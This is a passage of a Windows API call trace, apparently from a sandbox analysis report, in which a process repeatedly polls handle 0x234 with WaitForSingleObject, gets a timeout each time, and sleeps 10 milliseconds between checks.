dwMilliseconds=0x0) returned 0x102 [0247.519] Sleep (dwMilliseconds=0xa) [0247.592] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.592] Sleep (dwMilliseconds=0xa) [0247.674] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.674] Sleep (dwMilliseconds=0xa) [0247.725] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.725] Sleep (dwMilliseconds=0xa) [0247.781] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.781] Sleep (dwMilliseconds=0xa) [0247.852] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.852] Sleep (dwMilliseconds=0xa) [0247.905] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.905] Sleep (dwMilliseconds=0xa) [0247.994] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0247.994] Sleep (dwMilliseconds=0xa) [0248.068] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.069] Sleep (dwMilliseconds=0xa) [0248.200] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.200] Sleep (dwMilliseconds=0xa) [0248.266] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.266] Sleep (dwMilliseconds=0xa) [0248.338] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.338] Sleep (dwMilliseconds=0xa) [0248.423] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.423] Sleep (dwMilliseconds=0xa) [0248.525] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.525] Sleep (dwMilliseconds=0xa) [0248.643] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.643] Sleep (dwMilliseconds=0xa) [0248.719] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.719] Sleep (dwMilliseconds=0xa) [0248.781] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.781] Sleep (dwMilliseconds=0xa) [0248.857] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.858] Sleep (dwMilliseconds=0xa) [0248.929] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0248.929] Sleep (dwMilliseconds=0xa) [0249.041] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.041] Sleep (dwMilliseconds=0xa) [0249.259] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.259] Sleep (dwMilliseconds=0xa) [0249.334] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.334] Sleep (dwMilliseconds=0xa) [0249.410] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.410] Sleep (dwMilliseconds=0xa) [0249.458] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.487] Sleep (dwMilliseconds=0xa) [0249.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.543] Sleep (dwMilliseconds=0xa) [0249.615] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.615] Sleep (dwMilliseconds=0xa) [0249.684] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.685] Sleep (dwMilliseconds=0xa) [0249.788] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.788] Sleep (dwMilliseconds=0xa) [0249.861] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0249.861] Sleep (dwMilliseconds=0xa) [0250.016] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.016] Sleep (dwMilliseconds=0xa) [0250.094] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.094] Sleep (dwMilliseconds=0xa) [0250.250] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.250] Sleep (dwMilliseconds=0xa) [0250.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.337] Sleep (dwMilliseconds=0xa) [0250.403] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.403] Sleep (dwMilliseconds=0xa) [0250.470] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.471] Sleep (dwMilliseconds=0xa) [0250.618] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.618] Sleep (dwMilliseconds=0xa) [0250.690] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.690] Sleep (dwMilliseconds=0xa) [0250.759] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.759] Sleep (dwMilliseconds=0xa) [0250.827] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.827] Sleep (dwMilliseconds=0xa) [0250.865] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.865] Sleep (dwMilliseconds=0xa) [0250.942] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0250.942] Sleep (dwMilliseconds=0xa) [0251.079] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.079] Sleep (dwMilliseconds=0xa) [0251.313] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.313] Sleep (dwMilliseconds=0xa) [0251.422] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.422] Sleep (dwMilliseconds=0xa) [0251.528] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.528] Sleep (dwMilliseconds=0xa) [0251.728] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.728] Sleep (dwMilliseconds=0xa) [0251.805] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.805] Sleep (dwMilliseconds=0xa) [0251.957] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0251.957] Sleep (dwMilliseconds=0xa) [0252.029] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.029] Sleep (dwMilliseconds=0xa) [0252.104] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.105] Sleep (dwMilliseconds=0xa) [0252.309] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.310] Sleep (dwMilliseconds=0xa) [0252.427] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.427] Sleep (dwMilliseconds=0xa) [0252.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.555] Sleep (dwMilliseconds=0xa) [0252.698] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.698] Sleep (dwMilliseconds=0xa) [0252.812] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.812] Sleep (dwMilliseconds=0xa) [0252.922] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0252.922] Sleep (dwMilliseconds=0xa) [0253.027] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.027] Sleep (dwMilliseconds=0xa) [0253.098] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.098] Sleep (dwMilliseconds=0xa) [0253.270] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.270] Sleep (dwMilliseconds=0xa) [0253.424] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.425] Sleep (dwMilliseconds=0xa) [0253.546] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.546] Sleep (dwMilliseconds=0xa) [0253.672] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.672] Sleep (dwMilliseconds=0xa) [0253.764] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.764] Sleep (dwMilliseconds=0xa) [0253.839] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.839] Sleep (dwMilliseconds=0xa) [0253.933] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0253.933] Sleep (dwMilliseconds=0xa) [0254.040] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.040] Sleep (dwMilliseconds=0xa) [0254.282] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.282] Sleep (dwMilliseconds=0xa) [0254.376] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.376] Sleep (dwMilliseconds=0xa) [0254.571] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.571] Sleep (dwMilliseconds=0xa) [0254.696] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.696] Sleep (dwMilliseconds=0xa) [0254.833] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0254.833] Sleep (dwMilliseconds=0xa) [0255.045] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.045] Sleep (dwMilliseconds=0xa) [0255.285] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.285] Sleep (dwMilliseconds=0xa) [0255.448] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.448] Sleep (dwMilliseconds=0xa) [0255.559] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.559] Sleep (dwMilliseconds=0xa) [0255.688] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.688] Sleep (dwMilliseconds=0xa) [0255.826] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.826] Sleep (dwMilliseconds=0xa) [0255.929] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0255.929] Sleep (dwMilliseconds=0xa) [0256.035] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.035] Sleep (dwMilliseconds=0xa) [0256.216] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.216] Sleep (dwMilliseconds=0xa) [0256.303] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.303] Sleep (dwMilliseconds=0xa) [0256.407] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.407] Sleep (dwMilliseconds=0xa) [0256.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.508] Sleep (dwMilliseconds=0xa) [0256.621] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.621] Sleep (dwMilliseconds=0xa) [0256.728] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.729] Sleep (dwMilliseconds=0xa) [0256.830] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.830] Sleep (dwMilliseconds=0xa) [0256.909] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0256.909] Sleep (dwMilliseconds=0xa) [0257.068] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.068] Sleep (dwMilliseconds=0xa) [0257.272] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.272] Sleep (dwMilliseconds=0xa) [0257.382] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.382] Sleep (dwMilliseconds=0xa) [0257.477] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.477] Sleep (dwMilliseconds=0xa) [0257.584] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.584] Sleep (dwMilliseconds=0xa) [0257.693] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.693] Sleep (dwMilliseconds=0xa) [0257.795] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.795] Sleep (dwMilliseconds=0xa) [0257.897] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0257.897] Sleep (dwMilliseconds=0xa) [0258.001] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.001] Sleep (dwMilliseconds=0xa) [0258.070] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.070] Sleep (dwMilliseconds=0xa) [0258.214] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.214] Sleep (dwMilliseconds=0xa) [0258.322] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.322] Sleep (dwMilliseconds=0xa) [0258.420] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.420] Sleep (dwMilliseconds=0xa) [0258.512] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.513] Sleep (dwMilliseconds=0xa) [0258.622] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.622] Sleep (dwMilliseconds=0xa) [0258.704] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.705] Sleep (dwMilliseconds=0xa) [0258.829] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.829] Sleep (dwMilliseconds=0xa) [0258.934] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0258.934] Sleep (dwMilliseconds=0xa) [0259.000] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.000] Sleep (dwMilliseconds=0xa) [0259.065] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.065] Sleep (dwMilliseconds=0xa) [0259.104] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.104] Sleep (dwMilliseconds=0xa) [0259.189] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.189] Sleep (dwMilliseconds=0xa) [0259.226] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.227] Sleep (dwMilliseconds=0xa) [0259.268] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.268] Sleep (dwMilliseconds=0xa) [0259.323] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.323] Sleep (dwMilliseconds=0xa) [0259.360] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.360] Sleep (dwMilliseconds=0xa) [0259.384] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.384] Sleep (dwMilliseconds=0xa) [0259.452] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.453] Sleep (dwMilliseconds=0xa) [0259.548] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.548] Sleep (dwMilliseconds=0xa) [0259.579] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.579] Sleep (dwMilliseconds=0xa) [0259.599] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.599] Sleep (dwMilliseconds=0xa) [0259.617] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.617] Sleep (dwMilliseconds=0xa) [0259.651] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.651] Sleep (dwMilliseconds=0xa) [0259.673] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.673] Sleep (dwMilliseconds=0xa) [0259.708] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.708] Sleep (dwMilliseconds=0xa) [0259.739] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.739] Sleep (dwMilliseconds=0xa) [0259.758] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.758] Sleep (dwMilliseconds=0xa) [0259.795] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.795] Sleep (dwMilliseconds=0xa) [0259.830] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.830] Sleep (dwMilliseconds=0xa) [0259.865] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.865] Sleep (dwMilliseconds=0xa) [0259.902] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.902] Sleep (dwMilliseconds=0xa) [0259.937] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0259.937] Sleep (dwMilliseconds=0xa) [0260.007] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.007] Sleep (dwMilliseconds=0xa) [0260.400] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.400] Sleep (dwMilliseconds=0xa) [0260.437] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.437] Sleep (dwMilliseconds=0xa) [0260.507] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.507] Sleep (dwMilliseconds=0xa) [0260.519] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.519] Sleep (dwMilliseconds=0xa) [0260.532] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.532] Sleep (dwMilliseconds=0xa) [0260.592] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.592] Sleep (dwMilliseconds=0xa) [0260.619] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.619] Sleep (dwMilliseconds=0xa) [0260.630] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.630] Sleep (dwMilliseconds=0xa) [0260.644] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.644] Sleep (dwMilliseconds=0xa) [0260.657] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.657] Sleep (dwMilliseconds=0xa) [0260.672] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.673] Sleep (dwMilliseconds=0xa) [0260.689] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.690] Sleep (dwMilliseconds=0xa) [0260.707] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.707] Sleep (dwMilliseconds=0xa) [0260.720] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.720] Sleep (dwMilliseconds=0xa) [0260.731] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.731] Sleep (dwMilliseconds=0xa) [0260.744] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.744] Sleep (dwMilliseconds=0xa) [0260.757] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.757] Sleep (dwMilliseconds=0xa) [0260.778] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.778] Sleep (dwMilliseconds=0xa) [0260.795] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.795] Sleep (dwMilliseconds=0xa) [0260.808] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.808] Sleep (dwMilliseconds=0xa) [0260.826] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.826] Sleep (dwMilliseconds=0xa) [0260.839] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.839] Sleep (dwMilliseconds=0xa) [0260.854] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.854] Sleep (dwMilliseconds=0xa) [0260.868] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.868] Sleep (dwMilliseconds=0xa) [0260.882] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.882] Sleep (dwMilliseconds=0xa) [0260.900] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.900] Sleep (dwMilliseconds=0xa) [0260.911] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.911] Sleep (dwMilliseconds=0xa) [0260.923] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.923] Sleep (dwMilliseconds=0xa) [0260.944] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.944] Sleep (dwMilliseconds=0xa) [0260.958] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.958] Sleep (dwMilliseconds=0xa) [0260.971] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.971] Sleep (dwMilliseconds=0xa) [0260.983] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0260.983] Sleep (dwMilliseconds=0xa) [0261.006] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.006] Sleep (dwMilliseconds=0xa) [0261.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.018] Sleep (dwMilliseconds=0xa) [0261.034] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.034] Sleep (dwMilliseconds=0xa) [0261.047] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.047] Sleep (dwMilliseconds=0xa) [0261.059] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.059] Sleep (dwMilliseconds=0xa) [0261.072] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.072] Sleep (dwMilliseconds=0xa) [0261.084] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.084] Sleep (dwMilliseconds=0xa) [0261.098] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.098] Sleep (dwMilliseconds=0xa) [0261.113] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.113] Sleep (dwMilliseconds=0xa) [0261.126] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.126] Sleep (dwMilliseconds=0xa) [0261.152] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.152] Sleep (dwMilliseconds=0xa) [0261.165] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.165] Sleep (dwMilliseconds=0xa) [0261.180] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.180] Sleep (dwMilliseconds=0xa) [0261.198] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.198] Sleep (dwMilliseconds=0xa) [0261.216] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.216] Sleep (dwMilliseconds=0xa) [0261.228] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.228] Sleep (dwMilliseconds=0xa) [0261.243] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.243] Sleep (dwMilliseconds=0xa) [0261.438] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.438] Sleep (dwMilliseconds=0xa) [0261.600] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.600] Sleep (dwMilliseconds=0xa) [0261.673] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.673] Sleep (dwMilliseconds=0xa) [0261.712] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.712] Sleep (dwMilliseconds=0xa) [0261.747] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.747] Sleep (dwMilliseconds=0xa) [0261.782] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.782] Sleep (dwMilliseconds=0xa) [0261.819] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.819] Sleep (dwMilliseconds=0xa) [0261.864] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.865] Sleep (dwMilliseconds=0xa) [0261.908] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0261.908] Sleep (dwMilliseconds=0xa) [0262.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.018] Sleep (dwMilliseconds=0xa) [0262.100] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.100] Sleep (dwMilliseconds=0xa) [0262.186] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.186] Sleep (dwMilliseconds=0xa) [0262.320] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.320] Sleep (dwMilliseconds=0xa) [0262.461] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.461] Sleep (dwMilliseconds=0xa) [0262.581] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.581] Sleep (dwMilliseconds=0xa) [0262.669] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.669] Sleep (dwMilliseconds=0xa) [0262.776] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.776] Sleep (dwMilliseconds=0xa) [0262.850] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.850] Sleep (dwMilliseconds=0xa) [0262.923] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0262.923] Sleep (dwMilliseconds=0xa) [0263.031] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.031] Sleep (dwMilliseconds=0xa) [0263.105] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.105] Sleep (dwMilliseconds=0xa) [0263.190] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.190] Sleep (dwMilliseconds=0xa) [0263.264] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.264] Sleep (dwMilliseconds=0xa) [0263.336] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.336] Sleep (dwMilliseconds=0xa) [0263.495] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.495] Sleep (dwMilliseconds=0xa) [0263.564] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.564] Sleep (dwMilliseconds=0xa) [0263.601] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.601] Sleep (dwMilliseconds=0xa) [0263.618] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.618] Sleep (dwMilliseconds=0xa) [0263.654] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.654] Sleep (dwMilliseconds=0xa) [0263.704] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.704] Sleep (dwMilliseconds=0xa) [0263.736] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.736] Sleep (dwMilliseconds=0xa) [0263.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.789] Sleep (dwMilliseconds=0xa) [0263.841] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.841] Sleep (dwMilliseconds=0xa) [0263.881] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.881] Sleep (dwMilliseconds=0xa) [0263.923] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.923] Sleep (dwMilliseconds=0xa) [0263.965] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0263.965] Sleep (dwMilliseconds=0xa) [0264.021] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.021] Sleep (dwMilliseconds=0xa) [0264.058] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.058] Sleep (dwMilliseconds=0xa) [0264.102] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.102] 